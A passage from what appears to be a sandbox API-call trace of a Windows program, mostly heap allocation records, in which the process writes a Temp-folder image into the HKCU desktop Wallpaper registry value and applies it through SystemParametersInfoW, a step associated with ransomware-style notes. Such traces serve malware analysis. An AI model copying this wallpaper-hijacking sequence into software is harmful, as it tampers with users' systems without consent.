dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0277.166] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0277.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0277.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0277.167] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0277.167] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0277.167] RegCloseKey (hKey=0x2d0) returned 0x0 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0277.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0277.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0277.168] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0277.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0277.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0277.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0277.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0277.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0277.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0277.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0277.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0277.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0277.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0277.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0277.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0277.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0277.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0277.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0277.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0277.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0277.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0277.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0277.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0277.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0277.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0277.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0277.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0277.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0277.174] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0277.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69928 [0277.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69928, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0277.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0277.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0277.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0277.175] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0277.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0277.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0277.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0277.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0277.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0277.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0277.175] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0277.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0277.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0277.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0277.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0277.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0277.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0277.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0277.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0277.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0277.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0277.252] 